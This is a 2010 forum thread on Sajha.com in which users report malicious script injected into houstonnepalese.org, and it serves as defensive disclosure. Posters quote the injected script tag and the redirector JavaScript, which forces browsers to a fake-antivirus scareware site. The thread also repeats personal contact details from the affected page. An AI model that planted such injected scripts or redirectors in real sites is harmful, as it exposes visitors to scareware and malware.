Saajha
Replies to this thread:

More by Saajha
What people are reading
Subscribers
Subscribers
[Total Subscribers 1]

Slackdemic
:: Subscribe
Back to: Computer/IT Refresh page to view new replies
 Malware link on www.houstonnepalese.org
[VIEWED 9752 TIMES]
SAVE! for ease of future access.
Posted on 08-19-10 12:05 PM     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

There's some malicious script embedded within www.houstonnepalese.org site. This script, upon execution, redirects browsers to some malware housing site.
 

I tried sending an email to admin@houstonnepalese.org , but it bounced back.

Technical details of permanent failure:


Google tried to deliver your message, but it was rejected by the
recipient domain. We recommend contacting the other email provider for
further information about the cause of this error. The error that the
other server returned was: 554 554 5.7.1 <
admin@houstonnepalese.org>: Recipient address rejected: Access denied (state 14).





----- Original message -----


Can someone pass this info to the appropriate website admin(s)?

They should remove the following from their source code:

<script src="http://whereisdudescars.com/js2.php"></script>

Thanks!

~@~



 
Posted on 08-19-10 12:09 PM     [Snapshot: 11]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 









News arrow Contacts




[Disallowed String for - ] language=JavaScript type=text/javascript>



[Disallowed String for - ] type=text/javascript>



Contacts













Dr. Rupak Rauniar













Address:
6776 Southwest Freeway, Suite 450
Houston, TX 77074









Telephone: T: (713) 773-4348
Fax: F: (713) 773-1948






Information: NAH Emergency Contacts:
1. Gyanshor Shrestha, 832-816-6448, gyanshor@yahoo.com
2. Rupak Rauniar, 713-436-3677, rrauniar@yahoo.com
3. Chej Gurung, 832-526-8750, grgchej@yahoo.com

 

Fill this form out if you want to subscribe to our newsgroup or have any other comments.















 
Posted on 08-19-10 12:27 PM     [Snapshot: 24]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

use FF or chrome while Browsing this Site..Google's Safe Browsing API Flags this Site as Hosting/Redirecting to download Scare ware/fake-av.However this Site doesn't seem to host the Exploits.

 
Posted on 08-19-10 12:31 PM     [Snapshot: 49]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

Damn bro.....that sucks

 
Posted on 08-19-10 12:42 PM     [Snapshot: 57]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

I just spoke with someone and passed the info. Thanks - MillionDollars!

@pyara -- the site isn't hosting the exploit; it's got the redirector that takes your browser to the site that does:

<script src="http://whereisdudescars.com/js2.php"></script>

Do the view source, and look at the bottom of the page; you should see the above script.
whereisdudescars.com is the site that houses the fakeAV stuff.

~@~

 
Posted on 08-19-10 1:01 PM     [Snapshot: 72]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

@saajha..It's a Multiple redirect, Seems as if the Actual Landing Point is the Following URL http://www4.checkpc95.co.cc/p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXpWYxGlqZm%2BVlQ%3D%3D-It triggers the Fake-AV/Scare ware.

This is the Source-code from http://whereisdudescars.com

function sec(conn,v,ex){ var exdate=new Date(); exdate.setDate(exdate.getDate()+ex); document.cookie=conn+"="+escape(v)+";expires="+exdate.toGMTString(); } function gec(conn){ if (document.cookie.length>0){ cs=document.cookie.indexOf(conn+"="); if (cs!=-1){cs=cs+conn.length+1;ce=document.cookie.indexOf(";",cs);if (ce==-1) ce=document.cookie.length;return unescape(document.cookie.substring(cs,ce));} } return ""; } var n=gec("xornopxor"); if (n==""){ sec("xornopxor","1",20); var u="http://www4.checkpc95.co.cc/?p=p52dcWplanKHnc3KbmNToKV1iqHWnG3HXpWYxGlqZm%2BVlQ%3D%3D"; window.top.location.replace(u); 

..Neverthless whoz Life treating You.!!

 
Posted on 08-19-10 1:04 PM     [Snapshot: 79]     Reply [Subscribe]
Login in to Rate this Post:     0       ?    
 

I just opened this on my work computer. Does anyone know if this stays on my computer or how to get rid of this?
 


Please Log in! to be able to reply! If you don't have a login, please register here.

YOU CAN ALSO



IN ORDER TO POST!




Within last 365 days
Recommended Popular Threads Controvertial Threads
शीर्षक जे पनि हुन सक्छ।
डीभी परेन भने खुसि हुनु होस् ! अमेरिकामाधेरै का श्रीमती अर्कैसँग पोइला गएका छन् !
What are your first memories of when Nepal Television Began?
Sajha Poll: नेपालका सबैभन्दा आकर्षक महिला को हुन्?
ChatSansar.com Naya Nepal Chat
NRN card pros and cons?
TPS Re-registration case still pending ..
Basnet or Basnyat ??
TPS Re-registration
निगुरो थाहा छ ??
Nas and The Bokas: Coming to a Night Club near you
Toilet paper or water?
Anybody gotten the TPS EAD extension alert notice (i797) thing? online or via post?
अमेरिकामा छोरा हराएको सूचना
ढ्याउ गर्दा दसैँको खसी गनाउच
Sajha Poll: Who is your favorite Nepali actress?
Problems of Nepalese students in US
nrn citizenship
TPS EAD auto extended to June 2025 or just TPS?
अमेरिकामा बस्ने प्राय जस्तो नेपालीहरु सबै मध्यम बर्गीय अथवा माथि (higher than middle class)
Nas and The Bokas: Coming to a Night Club near you
NOTE: The opinions here represent the opinions of the individual posters, and not of Sajha.com. It is not possible for sajha.com to monitor all the postings, since sajha.com merely seeks to provide a cyber location for discussing ideas and concerns related to Nepal and the Nepalis. Please send an email to admin@sajha.com using a valid email address if you want any posting to be considered for deletion. Your request will be handled on a one to one basis. Sajha.com is a service please don't abuse it. - Thanks.

Sajha.com Privacy Policy

Like us in Facebook!

↑ Back to Top
free counters